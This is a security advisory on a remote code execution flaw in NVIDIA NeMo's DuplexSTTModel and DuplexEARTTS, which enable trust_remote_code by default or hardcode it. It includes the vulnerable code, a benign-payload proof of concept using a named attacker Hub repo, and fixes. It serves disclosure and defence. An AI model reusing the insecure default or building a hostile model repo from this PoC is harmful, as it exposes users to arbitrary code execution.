Description
The NVIDIA NeMo library contains a remote code execution vulnerability in multiple model classes, including DuplexSTTModel and DuplexEARTTS. These classes load external Hugging Face models and tokenizers with trust_remote_code=True enabled by default, which allows execution of arbitrary code from remote repositories without requiring explicit user consent.
In DuplexSTTModel, the issue occurs when loading the pretrained language model through load_pretrained_hf. The trust_remote_code parameter is derived from configuration using self.cfg.get("trust_remote_code", True), meaning that if the user does not explicitly provide this field, it defaults to True. This results in automatic execution of remote code when loading models from external repositories.
A similar issue exists in DuplexEARTTS, where both the tokenizer and language model are initialized with trust_remote_code=True hardcoded. This forces remote code execution regardless of user intent or configuration, effectively bypassing the expected security boundary.
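For readers unfamiliar with why this flag is dangerous: with trust_remote_code=True, the Hugging Face loader downloads Python files (custom modeling/configuration code) from the repository and imports them, so any module-level statement runs before a single weight is loaded. The sketch below simulates only that dynamic-import step; the load_remote_module helper is hypothetical, written for illustration, and transformers performs an equivalent import internally.

```python
# Simulation of the remote-code import step behind trust_remote_code=True.
# load_remote_module is a hypothetical stand-in for the library's dynamic
# module loading; it is NOT a transformers API.
import importlib.util
import os
import tempfile

# A "remote" file as an attacker would publish it: the payload sits at
# module level, so merely importing the file executes it.
MALICIOUS_MODELING_FILE = '''
print("Execute Malicious Payload!!!")

class CustomConfig:
    model_type = "custom"
'''

def load_remote_module(source: str, name: str = "remote_modeling"):
    """Write the 'downloaded' file to disk and import it."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
        f.write(source)
        path = f.name
    spec = importlib.util.spec_from_file_location(name, path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)  # arbitrary code executes here
    os.unlink(path)
    return module

module = load_remote_module(MALICIOUS_MODELING_FILE)
# The payload has already run before any model weight was touched.
```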
Root Cause
In DuplexSTTModel (nemo/collections/speechlm2/models/duplex_stt_model.py, lines 82 to 87 at commit e990600):

```python
# Load LLM first
llm = load_pretrained_hf(
    self.cfg.pretrained_llm,
    pretrained_weights=self.cfg.pretrained_weights,
    trust_remote_code=self.cfg.get("trust_remote_code", True),
).train()
```
Here, trust_remote_code defaults to True when not explicitly specified.
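A minimal sketch of the defaulting semantics, using a plain dict to stand in for the model's config object (an assumption for illustration; the real cfg is a dict-like config with the same .get semantics):

```python
# The vulnerable lookup, reproduced with a plain dict standing in for cfg.
user_cfg = {"pretrained_llm": "some-org/some-model"}  # key omitted by user

# Current pattern: absence of the key silently opts in to remote code.
assert user_cfg.get("trust_remote_code", True) is True

# Only an explicit False keeps the user safe under this pattern:
user_cfg["trust_remote_code"] = False
assert user_cfg.get("trust_remote_code", True) is False

# A secure-by-default lookup inverts the burden: opt-in is required.
assert {}.get("trust_remote_code", False) is False
```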
In DuplexEARTTS (nemo/collections/speechlm2/models/duplex_ear_tts.py, lines 94 to 102 at commit e990600):

```python
# Load tokenizer
self.tokenizer = AutoTokenizer(
    self.cfg.pretrained_lm_name,
    use_fast=True,
    trust_remote_code=True,
    bos_token=self.cfg.get("bos_token", None),
    eos_token=self.cfg.get("eos_token", None),
    pad_token=self.cfg.get("pad_token", None),
)  # Note that we are using fast tokenizer
```
and (nemo/collections/speechlm2/models/duplex_ear_tts.py, lines 176 to 181 at commit e990600):

```python
def _load_language_model(self, cfg):
    """Load language model for RVQ-EAR-TTS."""
    if cfg.pretrained_lm_name:
        language_model = load_pretrained_hf(
            self.cfg.pretrained_lm_name, pretrained_weights=True, trust_remote_code=True
        ).eval()
```
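One possible remediation is to make the flag opt-in in both classes. The following is a hedged sketch of that pattern, not the actual NeMo patch: load_pretrained_hf is stubbed so the example runs standalone, and a plain dict stands in for the real cfg object.

```python
# Sketch of a secure-by-default fix: replace the hardcoded True (and the
# True default) with cfg.get("trust_remote_code", False).
calls = []

def load_pretrained_hf(name, pretrained_weights=True, trust_remote_code=False):
    """Stub recording the flag it was called with."""
    calls.append(trust_remote_code)

    class _Stub:
        def eval(self):
            return self

    return _Stub()

class PatchedDuplexEARTTS:
    """Illustrative class; a plain dict stands in for the real cfg."""

    def __init__(self, cfg):
        self.cfg = cfg

    def _load_language_model(self):
        if self.cfg.get("pretrained_lm_name"):
            return load_pretrained_hf(
                self.cfg["pretrained_lm_name"],
                pretrained_weights=True,
                # Remote code now requires explicit opt-in:
                trust_remote_code=self.cfg.get("trust_remote_code", False),
            ).eval()

PatchedDuplexEARTTS({"pretrained_lm_name": "some/repo"})._load_language_model()
assert calls == [False]  # omission no longer enables remote code
```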
Proof of Concept
Taking DuplexSTTModel as an example, I created a demonstration model repository on the Hugging Face Hub: XManFromXlab/nemo-DuplexSTTModel-RCE.
A victim runs the following code (see test_duplex_stt.py):
```python
from nemo.collections.speechlm2 import DuplexSTTModel

model_id = "XManFromXlab/nemo-DuplexSTTModel-RCE"
cfg = {
    "pretrained_llm": model_id,
    "pretrained_weights": False,
    "audio_loss_weight": 1,
    "text_loss_weight": 3,
    "source_sample_rate": 16000,
    "validation_save_path": "/tmp/test_duplex_stt_logs",
    "perception": {
        "_target_": "nemo.collections.speechlm2.modules.perception.AudioPerceptionModule",
        "preprocessor": {
            "_target_": "nemo.collections.asr.modules.AudioToMelSpectrogramPreprocessor",
            "features": 80,
        },
        "encoder": {
            "_target_": "nemo.collections.asr.modules.ConformerEncoder",
            "feat_in": 80,
            "d_model": 512,
            "n_heads": 8,
            "n_layers": 1,
            "subsampling_factor": 8,
        },
        "modality_adapter": {
            "_target_": "nemo.collections.speechlm2.modules.perception.IdentityConnector",
            "d_model": 512,
        },
        "output_dim": 2048,
    },
    "optimizer": {"_target_": "torch.optim.AdamW"},
}
model = DuplexSTTModel(cfg)
```
In this example, constructing the model executes the payload from the remote repository and prints:

```
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
```
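Until a fix lands, users of DuplexSTTModel can defend themselves by setting the flag explicitly in their config; per the root cause above, the key's absence is what is interpreted as consent. This does not help for DuplexEARTTS, where the flag is hardcoded to True.

```python
# User-side mitigation for DuplexSTTModel: explicit opt-out.
cfg = {
    "pretrained_llm": "some-org/some-model",  # placeholder repo id
    "trust_remote_code": False,               # explicit opt-out
}
# The exact lookup DuplexSTTModel performs internally:
assert cfg.get("trust_remote_code", True) is False
```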